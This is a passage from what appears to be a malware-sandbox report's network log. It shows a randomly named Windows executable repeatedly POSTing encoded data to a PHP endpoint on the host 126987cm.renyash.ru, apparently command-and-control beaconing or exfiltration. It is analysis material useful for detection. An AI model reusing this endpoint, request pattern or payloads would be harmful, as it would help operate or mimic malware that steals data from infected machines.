                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3206&min_rtt=1585&rtt_var=3836&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=100322&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                19192.168.2.449760172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:41.268284082 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:41.637108088 CET1072OUTData Raw: 51 54 5e 53 53 41 59 5e 5d 56 5b 57 54 55 51 5d 58 55 58 5f 5b 51 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QT^SSAY^]V[WTUQ]XUX_[QWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0 41Z"$%-+"]#+78"(R09)@&++%*!^&%X*
                                                                                                                                Jan 1, 2025 21:47:41.712313890 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:41.979022026 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:41 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=51B0Fwcc%2BkVlzKAqokS5VAKBhVmeUPML5g41iHnbcTu3ru6AyGYIftmx1J9fdMguyw67yXINQqzbFhKUmCZlZ7xhuLdk49wcrU%2FV5hFzVwd76NSArXIkDpv08w%2B0wb7bIVkiKdeX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dad6ccb78ed-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3502&min_rtt=2002&rtt_var=3751&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=104241&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                20192.168.2.449761172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:42.111253977 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:42.467895985 CET1072OUTData Raw: 54 52 5e 54 56 4a 59 51 5d 56 5b 57 54 5a 51 5d 58 53 58 5a 5b 53 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR^TVJYQ]V[WTZQ]XSXZ[SWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'0"2.5>]'/!;+<5%'0 [=&?<Z&!^&%X*?
                                                                                                                                Jan 1, 2025 21:47:42.554991007 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:42.833559036 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:42 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2MqXRDAZEOJOwPEawB3N2kh8p2iKr16y04v1p8uPDVU0X3ojjGfud8F%2FgZPSapIZqzIN%2BiF09LRrORGQqURG3J1dLZG09sDOnhxQZZOtGzCF01FQ%2Bi4lsIBbMegq3%2BFH8XLfPdYt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55db2a855c3f8-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2274&min_rtt=1697&rtt_var=1790&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=231232&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                21192.168.2.449762172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:42.952658892 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:43.311743975 CET1072OUTData Raw: 54 52 5b 5e 56 44 59 5f 5d 56 5b 57 54 5f 51 58 58 50 58 5a 5b 51 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR[^VDY_]V[WT_QXXPXZ[QWCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Z$071&6>0= X!4+05& T'&=&>._1!^&%X*+
                                                                                                                                Jan 1, 2025 21:47:43.397480011 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:43.659979105 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:43 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BVx%2Fo%2FIpHDPJnMh4KgEmf1myG1A3iV1PEYu2LjeZclMxQm8Cz5kJ66fH0BplGqy8TXCmStyGOip5%2B7XXLSSqp7%2FXESvwsqz7097DrJhI127fKD9P7VoffZHi4IAvBZ7ckvrkkQDm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55db7ed905e62-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2777&min_rtt=2026&rtt_var=2263&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=181614&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                22192.168.2.449763172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:43.782020092 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:44.156883001 CET1072OUTData Raw: 54 53 5b 56 53 40 59 5e 5d 56 5b 57 54 5d 51 52 58 51 58 50 5b 54 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TS[VS@Y^]V[WT]QRXQXP[TWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^'1341:">;\0.35;+?$(!&;30Y(&9E+?'*!^&%X*#
                                                                                                                                Jan 1, 2025 21:47:44.226103067 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:44.507297993 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:44 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2BP%2FW4qOTLoFBHEXTpiln4ArVstKYVNxSZpVCXKP4Cg2ONQyatQFAy6dtjnI4sYzrBW0RXhGCozqnmJwKT9tGOR%2B9NOs%2FmXAeRmAXN5cqEL9WHwsQLVVfNFRVHFVG3TFOF1Hxc0F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dbd18788cc6-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3753&min_rtt=2030&rtt_var=4207&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=92323&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                23192.168.2.449764172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:44.641060114 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:45.019877911 CET1072OUTData Raw: 54 56 5e 53 56 44 59 56 5d 56 5b 57 54 5e 51 5e 58 55 58 5e 5b 50 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV^SVDYV]V[WT^Q^XUX^[PWEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_&"34.5.;]3=/#;#W?$"6;%0)=6?8[2!^&%X*/
                                                                                                                                Jan 1, 2025 21:47:45.111927032 CET25INHTTP/1.1 100 Continue


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                24192.168.2.449765172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:45.230207920 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:45.582808971 CET1788OUTData Raw: 54 53 5e 57 56 4a 59 57 5d 56 5b 57 54 5b 51 53 58 57 58 5f 5b 54 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TS^WVJYW]V[WT[QSXWX_[TWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$#Y#T2!-;3,"8+3P"5,W$ *)E< ^%:!^&%X*
                                                                                                                                Jan 1, 2025 21:47:45.674057961 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:45.980638981 CET958INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:45 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=va4%2BFpFbk5kabBWN2EN39fL9nTSmUhs6JEQ9wv%2BnerA8Q1zppsBU8wln%2B6OjFFLVkElH9EvQ%2F4LM0ttQsoEb22YhTyQ5j%2BV1TAVbxibOPRv76myJm0mpCIaQW1j0V2PAqfmcLX%2FI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dc62b5d19aa-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1898&rtt_var=855&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=590376&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 22 0c 3c 08 20 0f 37 54 2d 53 2a 2b 38 07 25 1f 2a 11 27 20 3d 08 3c 06 2b 59 2b 3f 37 08 25 5a 38 14 33 3a 0c 0b 3f 32 20 58 3e 0c 20 5c 05 1b 39 5b 26 39 0e 02 31 38 3a 0d 29 23 34 15 21 3c 32 12 29 0d 3f 0e 23 3b 29 1f 25 2b 35 1e 27 29 3e 52 29 3f 2f 17 2a 20 2b 50 24 3d 2a 51 0f 16 38 1f 28 33 22 59 2a 3f 3c 12 24 22 27 00 23 35 03 1e 25 3b 3f 57 24 2a 25 03 28 58 3f 51 22 0d 30 0c 26 3c 0c 58 24 2e 3f 52 2d 10 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98"< 7T-S*+8%*' =<+Y+?7%Z83:?2 X> \9[&918:)#4!<2)?#;)%+5')>R)?/* +P$=*Q8(3"Y*?<$"'#5%;?W$*%(X?Q"0&<X$.?R-&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                25192.168.2.449766172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:45.482342005 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:45.827227116 CET1072OUTData Raw: 54 5f 5b 54 56 44 5c 51 5d 56 5b 57 54 59 51 52 58 55 58 5b 5b 57 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T_[TVD\Q]V[WTYQRXUX[[WWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X$/ "Y!#%=(#+;T+$?U!7$0>C+>8X2*!^&%X*3
                                                                                                                                Jan 1, 2025 21:47:45.954524040 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:46.226491928 CET796INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:46 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S3X2rMuLMbXy32bM4woYrFgOPfZ7H71jvCtBVwoOX71VR9RKd%2Bpad7LIzdkHDvqMx6dwSeNB7L5izWNnlcHpnXZDUUmUIMZkWSkzMsbsrIm1yBloExsQkFstOs8njSe7Swmt9BTi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dc7ef6d420b-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2852&min_rtt=1616&rtt_var=3079&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=126846&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a
                                                                                                                                Data Ascii: 40VX[
                                                                                                                                Jan 1, 2025 21:47:46.318886042 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                26192.168.2.449767172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:46.550029039 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:46.958040953 CET1072OUTData Raw: 54 54 5b 56 53 40 59 5e 5d 56 5b 57 54 5b 51 52 58 5d 58 5d 5b 56 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[VS@Y^]V[WT[QRX]X][VWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["&1/#9]"-$3=/#+8+Q66$31)<=+1!^&%X*
                                                                                                                                Jan 1, 2025 21:47:46.993017912 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:47.234802008 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:47 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RUoCOWulIiAsuL2G2MiyI4gy%2BTQGHzRlloBEEfIE30AN7P%2FbDJdqOhVM2FCVFpRUTkDjaL6x5HY8FnqsDA5NavRTaq%2F7cTBpeFaAFtTnvUCAq9q5VUqV%2FQObI589zfgFSzPJ123m"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dce6aed437f-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3129&min_rtt=1570&rtt_var=3708&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=103921&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                27192.168.2.449768172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:47.451222897 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:47.795994997 CET1072OUTData Raw: 51 54 5b 53 56 4a 5c 53 5d 56 5b 57 54 5f 51 5b 58 56 58 51 5b 53 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QT[SVJ\S]V[WT_Q[XVXQ[SWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^',7!" =#0-'5+U+$?P683]=56?X;'*!^&%X*+
                                                                                                                                Jan 1, 2025 21:47:47.899492979 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:48.161886930 CET814INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:48 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SNiGPtap2JY8la1GN%2Bce%2BhAVeCOixoUulGr88V%2BHdmorqg%2ByCu%2FCV37yn4uEgz8Lx50f5iDS1eBWqQOsxEHqjvQBWQccz07UlJ%2BdPSDMs%2BTYwAt4KSW9wI%2Ff6mrjZ0M011zgNJfy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55dd419068c51-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3462&min_rtt=1819&rtt_var=3969&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=97541&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


